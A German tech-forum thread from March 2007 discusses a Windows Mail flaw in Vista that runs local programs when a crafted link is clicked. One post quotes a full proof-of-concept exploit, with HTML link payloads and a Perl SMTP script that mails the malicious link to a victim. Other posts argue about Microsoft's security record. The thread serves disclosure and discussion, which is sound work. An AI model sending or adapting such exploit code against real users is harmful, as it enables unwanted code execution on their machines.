WinFuture-Forum.de: Erste Lücke In Vistas Windows Mail - WinFuture-Forum.de

Zum Inhalt wechseln

Beiträge in diesem Forum erhöhen euren Beitragszähler nicht.
Seite 1 von 1

Erste Lücke In Vistas Windows Mail


#1 Mitglied ist offline   Großer 

  • Gruppe: aktive Mitglieder
  • Beiträge: 3.930
  • Beigetreten: 15. Juni 04
  • Reputation: 0

geschrieben 25. März 2007 - 13:08

Erste Lücke in Vistas Windows Mail

Der Nachfolger von Outlook Express knüpft nahtlos an dessen zweifelhaften Ruf in Sicherheitsfragen an. Bereits wenige Monate nach der offiziellen Freigabe wurde nun das erste bedenkliche Sicherheitsproblem aufgedeckt: Unter bestimmten Umständen kann ein einfacher Klick auf eine URL dazu führen, dass auf dem lokalen Rechner ein Programm gestartet wird.
Anzeige

Ein Hacker mit dem Pseudonym Kingcope berichtete auf einer Sicherheits-Mailingliste, dass es dazu genügt, in eine Mail einen Link mit einem Verweis auf ein lokales Programm einzubetten. Wenn ein Ordner mit dem gleichen Namen wie das ausführbare Programm existiert, führt Vista Mail bei einem Klick auf den Link das Programm ohne Nachfrage aus. In einem kurzen Eigenversuch konnte heise Security diese Darstellung bestätigen: Nachdem in C:\Windows\System32\ ein Ordner namens calc angelegt wurde, startete ein Klick auf den Link zu c:/windows/system32/calc? den Taschenrechner ohne weitere Nachfrage.

Vollständger Artikel und Quelle
0

Anzeige



#2 Mitglied ist offline   Stan 

  • Gruppe: aktive Mitglieder
  • Beiträge: 7.013
  • Beigetreten: 06. Juni 04
  • Reputation: 35
  • Geschlecht:Männlich
  • Wohnort:München

geschrieben 25. März 2007 - 13:37

hm warum wunderts mich nicht dass diese news von dir "kommt"....naja ich sag dazu nur

http://winfuture.de/news,30782.html
0

#3 Mitglied ist offline   Großer 

  • Gruppe: aktive Mitglieder
  • Beiträge: 3.930
  • Beigetreten: 15. Juni 04
  • Reputation: 0

geschrieben 25. März 2007 - 14:12

Warum wundert es mich nicht, das Du dies "bemängelst"...

Ich frage mich warum Du auf eine "Studie" verweist, die fern jeder Realität ist da:

- sie von Microsoft selbst stammt
- keine Angaben gemacht werden was genau die "Studie" beinhaltet
- Äpfel mit Birnen verglichen werden
- bei Ubuntu sind alle Lücken bereits geschlossen, während bei Vista laut Secunia noch 67% offen sind

Dieser Beitrag wurde von Großer bearbeitet: 25. März 2007 - 14:25

0

#4 Mitglied ist offline   e-hahn 

  • Gruppe: aktive Mitglieder
  • Beiträge: 530
  • Beigetreten: 17. Februar 07
  • Reputation: 39
  • Geschlecht:Männlich
  • Wohnort:Neuruppin

geschrieben 25. März 2007 - 14:21

Fragt sich nur in wieweit das nun tatsächlich ein Problem werden könnte, sicherheitsrelevante Programme oder auch systemnahe Programme können eh nicht so ohne weiteres gestartet werden.
0

#5 Mitglied ist offline   Internetkopfgeldjäger 

  • Gruppe: aktive Mitglieder
  • Beiträge: 1.718
  • Beigetreten: 29. Januar 04
  • Reputation: 1
  • Geschlecht:Männlich
  • Interessen::-)

geschrieben 25. März 2007 - 16:39

Benutzer von Vista können sich ja selbst ein Bild machen,
ich zitiere hier mal den
Vista Windows Mail Proof of Concept Exploit:

Zitat

Vulnerability
Remote Code Execution is possible if a user clicks on a malicious prepared link.
Vistas Mail Client will execute any executable file if a folder exists with the same name.
For example the victim has a folder in C:\ named blah and a batch script named blah.bat
also in C:\. Now if the victim clicks on a link in the email message with the URL target
set to C:\blah the batch script is executed without even asking.
There is for example a CMD script by default in C:\Windows\System32\ named winrm.cmd
(and also a folder named winrm inside System32).

Exploit:
Send a HTML email message containing the URL:
<a href="c:/windows/system32/winrm?">Click here!</a>
or
<a href="c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking for permission.
These are just examples.

I could not pass arguments to winrm (hehe this would be beautiful), but I guess there
are several attack vectors.

Proof of Concept
---snip---
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);

$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("attacker\attacker.com");
$smtp->to("victim\victim.com");

$msg = "Subject: Vista Remote Code Exec\r\n"
."From: attacker\attacker.com\r\n"
."To: victim\victim.com\r\n"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a>";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;

Quelle:
http://archives.neohapsis.com/archives/ful...07-03/0344.html


Gruß, Internetkopfgeldjäger
0

#6 Mitglied ist offline   Graumagier 

  • Gruppe: aktive Mitglieder
  • Beiträge: 8.811
  • Beigetreten: 01. März 04
  • Reputation: 1
  • Geschlecht:Männlich
  • Wohnort:Graz, Österreich

geschrieben 25. März 2007 - 16:47

e-hahn sagte:

Fragt sich nur in wieweit das nun tatsächlich ein Problem werden könnte, sicherheitsrelevante Programme oder auch systemnahe Programme können eh nicht so ohne weiteres gestartet werden.

Ich denke dabei mal an Programme im Windows Mail-Cache :)

Dieser Beitrag wurde von Graumagier bearbeitet: 25. März 2007 - 16:47

"If you make something idiot proof, someone will invent a better idiot." - Marvin

For Emails always use OpenPGP. My KeyID: 0xA1E011A4
0

Thema verteilen:


Seite 1 von 1

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0